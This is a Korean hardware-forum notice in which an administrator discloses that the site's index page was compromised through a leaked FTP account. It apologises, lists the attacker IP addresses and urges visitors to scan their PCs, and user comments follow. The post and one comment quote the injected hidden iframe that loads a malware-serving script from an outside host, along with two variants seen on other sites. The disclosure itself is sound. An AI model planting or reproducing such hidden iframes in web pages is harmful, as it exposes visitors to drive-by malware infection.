기글 하드웨어 공지사항 게시판
![[레벨:111]](http://gigglehd.com/zbxe/modules/point/icons/giggle/111.gif "포인트:1097419point, 레벨:111/111"){kind=icon}
http://gigglehd.com/zbxe/2911756 아바스트에서...기글메인 바이러스...;; by 보바보바님.
http://gigglehd.com/zbxe/2912969 기글에서 바이러스 발견? by HLL님.
그리고 전화로 제보주신 마르왕자님까지.
요약해보면, 어배스트에서 기글에 바이러스가 있다는 걸로 뜬다는 말인데. 처음에는 어베스트 오진인줄 알고 집에 가서 소스만 확인해 보면 이상 없는걸로 판명되려니 하였지만.
...
확인해보니 진짜 뚫렸었습니다(...)
...
돌 던지셔도 할 말이 없습니다.
인덱스를 확인해 보니 문제의 태그가 바로 눈에 들어오더군요. 바로 이것입니다. 정체가 확인되지 않았으니 클릭은 하지 마세요.
<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi153" width=125 height=125 style="visibility: hidden"></iframe>
와~ 오늘도 날씨가 좋네? 거기에 일찍 끝나기까지? 노트북에서 국내 보도자료만 올리고 새 렌즈 끼워서 카메라 들고 밖에 나가야지~ 했던 생각은 완전히 사라져 버리고. 그냥 메인컴 켜서 모니터 쳐다보게 되었습니다.
ftp 로그를 뒤져본 결과 공격에 사용된 아이피는 다음과 같습니다.
79.125.239.229
98.226.89.50
81.183.179.215
190.79.22.69
174.103.193.209
24.34.77.206
99.56.123.216
200.42.232.151
186.14.86.187
68.12.199.91
114.47.77.40
71.198.9.110
여기서 몇가지 사실을 알 수 있습니다. 아이피들이 대중이 없다. 즉 여러 경로로 우회를 해서 접근했다는 것. 따라서 국정원이나 사이버수사대라면 몰라도 개인이 여기서 더 이상 뭔가를 알 순 없겠지요 -_-a.
SQL 인젝션이라던가 나오면 이제 정말 x되는거다 했지만 단순히 ftp 계정이 누출된듯 합니다. 로그 확인 결과 인데스에 접근한것 이외에 다른 것은 없습니다. 어찌보면 리눅스 계정보다 더 중요한(?) xe 비밀번호는 완전히 다른걸 사용중이며, 저 아이피들은 웹서버 쪽으로는 아예 접근조차 하지 않았었습니다. 이게 다행인지 불행인지는 모르겠습니다.
계정 비밀번호는 교체했는데 딱히 다른 대책은 생각나질 않습니다. 저 아이피들을 다 막는건 무의미할것 같고. 정기적으로 교체를 꾸준히 하는게 유일한 길일듯 합니다.
다들 어베스트 오진으로 생각하신듯 하니 그냥 아무 말 없이 슬쩍 바꾸고 묻어가는게 후폭풍은 더 적지 않을까 이런 생각도 해보지만, 그건 아무리 생각해도 올바른 길이 아니기에 그렇게 하진 않았습니다.
저 아이프레임 태그가 어떤 작용을 하는지는 모르겠습니다. http://www.robtex.com/dns/f5l.at.html를 보면 저 사이트가 문제가 있다라기보다는, 저걸 악용해서 뭔 짓을 하느냐가 더 중요하겠는데. 그걸 알 방법이 없습니다. 개인적으로는 일개 cgi로 할 수 있는 일이 그리 많진 않을 것이다라고 추측하지만 지금 여기서 제가 그런 말을 할 자격은 전혀 없습니다.
따라서 오늘 아침 8시쯤 부터 저녁 5시 사이에 접속하신 분들의 컴퓨터에 어떤 영향이 있었는지 없었는지조차 모르겠습니다. 그것이 이 공지를 쓰게 된 제일 큰 원인입니다. 바이러스 풀 스캔이라던가 이상한 패킷이 오간게 없나 확인을 좀 해보셔야 되지 않을까 싶습니다. 제가 신경을 안 써서 뚫린 주제에 바라는게 참 많군요.
...글은 다 썼는데 등록 버튼을 누르기가 매우 망설여지는군요. 정말 죄송합니다.
![[레벨:56]](http://gigglehd.com/zbxe/modules/point/icons/giggle/56.gif "포인트:32230point (76%), 레벨:56/111"){kind=icon}
![[레벨:54]](http://gigglehd.com/zbxe/modules/point/icons/giggle/54.gif "포인트:30162point (91%), 레벨:54/111"){kind=icon}
이네스
![[레벨:51]](http://gigglehd.com/zbxe/modules/point/icons/giggle/51.gif "포인트:26096point (8%), 레벨:51/111"){kind=icon}
뜨거운 페넘
![[레벨:49]](http://gigglehd.com/zbxe/modules/point/icons/giggle/49.gif "포인트:24517point (51%), 레벨:49/111"){kind=icon}
그나저나 다른 백신들은 하나도 검진이 안된게 신기;;; (다 싸구려 백신들인가~ 응?)
![[레벨:58]](http://gigglehd.com/zbxe/modules/point/icons/giggle/58.gif "포인트:34275point (54%), 레벨:58/111"){kind=icon}
금찬
![[레벨:66]](http://gigglehd.com/zbxe/modules/point/icons/giggle/66.gif "포인트:43603point (3%), 레벨:66/111"){kind=icon}
![[레벨:110]](http://gigglehd.com/zbxe/modules/point/icons/giggle/110.gif "포인트:257537point (43%), 레벨:110/111"){kind=icon}
u
![[레벨:40]](http://gigglehd.com/zbxe/modules/point/icons/giggle/40.gif "포인트:16363point (44%), 레벨:40/111"){kind=icon}
its
![[레벨:44]](http://gigglehd.com/zbxe/modules/point/icons/giggle/44.gif "포인트:19986point (70%), 레벨:44/111"){kind=icon}
하드매냐
![[레벨:101]](http://gigglehd.com/zbxe/modules/point/icons/giggle/101.gif "포인트:108995point (79%), 레벨:101/111"){kind=icon}
![[레벨:35]](http://gigglehd.com/zbxe/modules/point/icons/giggle/35.gif "포인트:12609point (50%), 레벨:35/111"){kind=icon}
라쿠루루
![[레벨:2]](http://gigglehd.com/zbxe/modules/point/icons/giggle/2.gif "포인트:88point (96%), 레벨:2/111"){kind=icon}
![[레벨:74]](http://gigglehd.com/zbxe/modules/point/icons/giggle/74.gif "포인트:54787point (1%), 레벨:74/111"){kind=icon}
향군
![[레벨:36]](http://gigglehd.com/zbxe/modules/point/icons/giggle/36.gif "포인트:13023point (8%), 레벨:36/111"){kind=icon}
riva
![[레벨:39]](http://gigglehd.com/zbxe/modules/point/icons/giggle/39.gif "포인트:15440point (29%), 레벨:39/111"){kind=icon}
雨日
![[레벨:30]](http://gigglehd.com/zbxe/modules/point/icons/giggle/30.gif "포인트:9308point (50%), 레벨:30/111"){kind=icon}
Ray
![[레벨:55]](http://gigglehd.com/zbxe/modules/point/icons/giggle/55.gif "포인트:30389point (12%), 레벨:55/111"){kind=icon}
![[레벨:23]](http://gigglehd.com/zbxe/modules/point/icons/giggle/23.gif "포인트:5415point (26%), 레벨:23/111"){kind=icon}
Hilm
![[레벨:94]](http://gigglehd.com/zbxe/modules/point/icons/giggle/94.gif "포인트:89694point (70%), 레벨:94/111"){kind=icon}
히야신스
![[레벨:102]](http://gigglehd.com/zbxe/modules/point/icons/giggle/102.gif "포인트:110456point (9%), 레벨:102/111"){kind=icon}
헌원황제
![[레벨:10]](http://gigglehd.com/zbxe/modules/point/icons/giggle/10.gif "포인트:1017point (8%), 레벨:10/111"){kind=icon}
소녀시대☆
![[레벨:20]](http://gigglehd.com/zbxe/modules/point/icons/giggle/20.gif "포인트:4059point (14%), 레벨:20/111"){kind=icon}
만년로리
![[레벨:31]](http://gigglehd.com/zbxe/modules/point/icons/giggle/31.gif "포인트:9861point (39%), 레벨:31/111"){kind=icon}
HLL
![[레벨:15]](http://gigglehd.com/zbxe/modules/point/icons/giggle/15.gif "포인트:2552point (97%), 레벨:15/111"){kind=icon}
白夜2ndT
누가, 가까운 곳에 사는 누군가에게 낄대인님께 술과 고기를!!! ; ㅂ;)/
![[레벨:18]](http://gigglehd.com/zbxe/modules/point/icons/giggle/18.gif "포인트:3259point (5%), 레벨:18/111"){kind=icon}
노코나
![[레벨:87]](http://gigglehd.com/zbxe/modules/point/icons/giggle/87.gif "포인트:77281point (90%), 레벨:87/111"){kind=icon}
소스케
![[레벨:11]](http://gigglehd.com/zbxe/modules/point/icons/giggle/11.gif "포인트:1409point (86%), 레벨:11/111"){kind=icon}
디렉터즈컷
![[레벨:7]](http://gigglehd.com/zbxe/modules/point/icons/giggle/7.gif "포인트:596point (70%), 레벨:7/111"){kind=icon}
Bardisch
우리 NOD32가 인식 못한다 했더니 Firefox에서 그냥 멈춰버리는? 빨리빨리 막아주는 우리 불여우
![[레벨:72]](http://gigglehd.com/zbxe/modules/point/icons/giggle/72.gif "포인트:53061point (84%), 레벨:72/111"){kind=icon}
andu
![[레벨:22]](http://gigglehd.com/zbxe/modules/point/icons/giggle/22.gif "포인트:5168point (72%), 레벨:22/111"){kind=icon}
JS
![[레벨:52]](http://gigglehd.com/zbxe/modules/point/icons/giggle/52.gif "포인트:27839point (76%), 레벨:52/111"){kind=icon}
네시아
![[레벨:9]](http://gigglehd.com/zbxe/modules/point/icons/giggle/9.gif "포인트:882point (37%), 레벨:9/111"){kind=icon}
내인생
http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=http%3A%2F%2Ff5l.at%3A8080%2F&lr=&aq=f&oq=
구글검색창에서 "http://f5l.at:8080/"만 쳤는데 3개가 뜨네요 기글하드웨어 포함해서요
기글하드웨어 다음 사례는
이번공격소스와비슷하지만 거꾸로된것입니다.
기글의 공격소스
<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi153" width=125 height=125 style="visibility: hidden"></iframe>
다른곳 공격소스 (기글다음)
<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>
다른곳 공격속스 (윗글다음)
<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>
3번째 공격소스를 링크한 사이트의 댓글중엔 이렇게써져있습니다.
"방문자가 바이러스에 감염이되어서 들어오면 사이트도 감염될수도있고 공격자가 일부로 사이트에 DDOS프로그램을 심어놓은걸수도잇습니다."
저 가운데 사이트 누르니까 트로이목마라고 뜨네요'ㅅ';;(눌러보시진마시길;;)
저 Iframe이 강제로 악성코드 다운로드 시키는걸로 아는데..잘모르겠군요'ㅅ';